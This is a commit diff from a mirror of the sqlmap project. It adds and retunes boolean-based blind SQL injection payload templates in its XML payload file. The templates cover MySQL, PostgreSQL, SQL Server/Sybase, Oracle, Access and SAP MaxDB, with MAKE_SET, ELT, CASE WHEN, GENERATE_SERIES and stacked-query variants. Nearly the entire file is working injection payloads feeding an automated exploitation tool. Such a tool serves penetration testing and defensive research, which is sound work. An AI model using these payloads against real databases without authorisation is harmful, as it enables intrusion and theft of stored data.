sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-02 20:54:13 +03:00
Code Issues Packages Projects Releases Wiki Activity

more consistency of boolean blind payloads - issue #1169

Browse Source
This commit is contained in:
Bernardo Damele 2015-02-20 11:34:16 +00:00
parent 201b605f9b
commit 5b65d2e133
1 changed files with 357 additions and 23 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

380
xml/payloads/01_boolean_blind.xml
View File

@ -263,7 +263,7 @@ Tag: <test>
<test>
<title>MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)</title>
<stype>1</stype>
<level>3</level>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
@ -278,6 +278,119 @@ Tag: <test>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND MAKE_SET([INFERENCE],[RANDNUM])</vector>
<request>
<payload>AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
</request>
<response>
<comparison>AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)</title>
<stype>1</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3</clause>
<where>2</where>
<vector>OR MAKE_SET([INFERENCE],[RANDNUM])</vector>
<request>
<payload>OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
</request>
<response>
<comparison>OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND ELT([INFERENCE],[RANDNUM])</vector>
<request>
<payload>AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
</request>
<response>
<comparison>AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)</title>
<stype>1</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<where>2</where>
<vector>OR ELT([INFERENCE],[RANDNUM])</vector>
<request>
<payload>OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1])</payload>
</request>
<response>
<comparison>OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])</comparison>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
<stype>1</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND ([INFERENCE])*[RANDNUM]</vector>
<request>
<payload>AND ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
</request>
<response>
<comparison>AND ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)</title>
<stype>1</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<where>2</where>
<vector>OR ([INFERENCE])*[RANDNUM]</vector>
<request>
<payload>OR ([RANDNUM]=[RANDNUM])*[RANDNUM1]</payload>
</request>
<response>
<comparison>OR ([RANDNUM]=[RANDNUM1])*[RANDNUM1]</comparison>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<!-- End of boolean-based blind tests - WHERE or HAVING clause -->
<!-- Boolean-based blind tests - Parameter replace -->
@ -290,7 +403,7 @@ Tag: <test>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM1] ELSE 1/(SELECT 0) END))</payload>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</comparison>
@ -428,12 +541,32 @@ Tag: <test>
</test>
<test>
<title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace (original value)</title>
<title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.0</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.0 boolean-based blind - Parameter replace (original value)</title>
<stype>1</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
@ -447,6 +580,25 @@ Tag: <test>
</details>
</test>
<test>
<title>MySQL &lt; 5.0 boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
</response>
<details>
<dbms>MySQL</dbms>
</details>
</test>
<test>
<title>MySQL &lt; 5.0 boolean-based blind - Parameter replace (original value)</title>
<stype>1</stype>
@ -475,7 +627,7 @@ Tag: <test>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM1] ELSE 1/(SELECT 0) END))</payload>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))</comparison>
@ -524,6 +676,7 @@ Tag: <test>
</details>
</test>
<!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->
<test>
<title>PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title>
<stype>1</stype>
@ -544,12 +697,33 @@ Tag: <test>
</test>
<test>
<title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>
<title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
</response>
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
<test>
<title>Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
@ -565,12 +739,31 @@ Tag: <test>
</test>
<test>
<title>Oracle boolean-based blind - Parameter replace (original value)</title>
<title>Oracle boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</comparison>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>Oracle boolean-based blind - Parameter replace (original value)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
@ -584,12 +777,31 @@ Tag: <test>
</test>
<test>
<title>Microsoft Access boolean-based blind - Parameter replace (original value)</title>
<title>Microsoft Access boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>IIF([INFERENCE],[RANDNUM],1/0)</vector>
<request>
<payload>IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0)</payload>
</request>
<response>
<comparison>IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0)</comparison>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>Microsoft Access boolean-based blind - Parameter replace (original value)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
<request>
<payload>IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
@ -603,12 +815,31 @@ Tag: <test>
</test>
<test>
<title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
<title>SAP MaxDB boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
</request>
<response>
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
</response>
<details>
<dbms>SAP MaxDB</dbms>
</details>
</test>
<test>
<title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
@ -658,7 +889,7 @@ Tag: <test>
<test>
<title>MySQL &gt;= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
<stype>1</stype>
<level>3</level>
<level>2</level>
<risk>1</risk>
<clause>2,3</clause>
<where>1</where>
@ -698,7 +929,7 @@ Tag: <test>
<test>
<title>MySQL &lt; 5.0 boolean-based blind - GROUP BY and ORDER BY clauses</title>
<stype>1</stype>
<level>4</level>
<level>3</level>
<risk>1</risk>
<clause>2,3</clause>
<where>1</where>
@ -778,19 +1009,19 @@ Tag: <test>
-->
<test>
<!-- <title>PostgreSQL boolean-based blind - GROUP BY and ORDER BY clauses (GENERATE_SERIES - original value)</title> -->
<title>PostgreSQL boolean-based blind - ORDER BY clauses (GENERATE_SERIES - original value)</title>
<title>PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<!-- <clause>2,3</clause> -->
<clause>3</clause>
<where>1</where>
<vector>,(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
<vector>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
<request>
<payload>,(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
<payload>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
</request>
<response>
<comparison>,(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
<comparison>,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison>
</response>
<details>
<dbms>PostgreSQL</dbms>
@ -962,13 +1193,13 @@ Tag: <test>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
<vector>;(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</vector>
<request>
<payload>;(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
<payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</payload>
<comment>#</comment>
</request>
<response>
<comparison>;(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</comparison>
<comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)</comparison>
</response>
<details>
<dbms>MySQL</dbms>
@ -983,13 +1214,13 @@ Tag: <test>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
<payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</payload>
<comment>#</comment>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
<comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)</comparison>
</response>
<details>
<dbms>MySQL</dbms>
@ -999,7 +1230,7 @@ Tag: <test>
<test>
<title>PostgreSQL boolean-based blind - Stacked queries</title>
<stype>1</stype>
<level>2</level>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
@ -1016,10 +1247,31 @@ Tag: <test>
</details>
</test>
<!-- Because of the syntax of GENERATE_SERIES() function, the 'then' condition must be 1, do not change it -->
<test>
<title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries</title>
<title>PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)</title>
<stype>1</stype>
<level>2</level>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
<vector>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1</vector>
<request>
<payload>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1</payload>
<comment>--</comment>
</request>
<response>
<comparison>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1</comparison>
</response>
<details>
<dbms>PostgreSQL</dbms>
</details>
</test>
<test>
<title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
@ -1037,5 +1289,87 @@ Tag: <test>
<os>Windows</os>
</details>
</test>
<test>
<title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)</vector>
<request>
<payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)</payload>
<comment>--</comment>
</request>
<response>
<comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)</comparison>
</response>
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
<test>
<title>Oracle boolean-based blind - Stacked queries</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</vector>
<request>
<payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</payload>
<comment>--</comment>
</request>
<response>
<comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</comparison>
</response>
<details>
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>Microsoft Access boolean-based blind - Stacked queries</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
<vector>;IIF([INFERENCE],1,1/0)</vector>
<request>
<payload>;IIF([RANDNUM]=[RANDNUM],1,1/0)</payload>
<comment>%16</comment>
</request>
<response>
<comparison>;IIF([RANDNUM]=[RANDNUM1],1,1/0)</comparison>
</response>
<details>
<dbms>Microsoft Access</dbms>
</details>
</test>
<test>
<title>SAP MaxDB boolean-based blind - Stacked queries</title>
<stype>1</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
<vector>;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END</vector>
<request>
<payload>;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END</payload>
<comment>--</comment>
</request>
<response>
<comparison>;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END</comparison>
</response>
<details>
<dbms>SAP MaxDB</dbms>
</details>
</test>
<!-- End of boolean-based blind tests - Stacked queries -->
</root>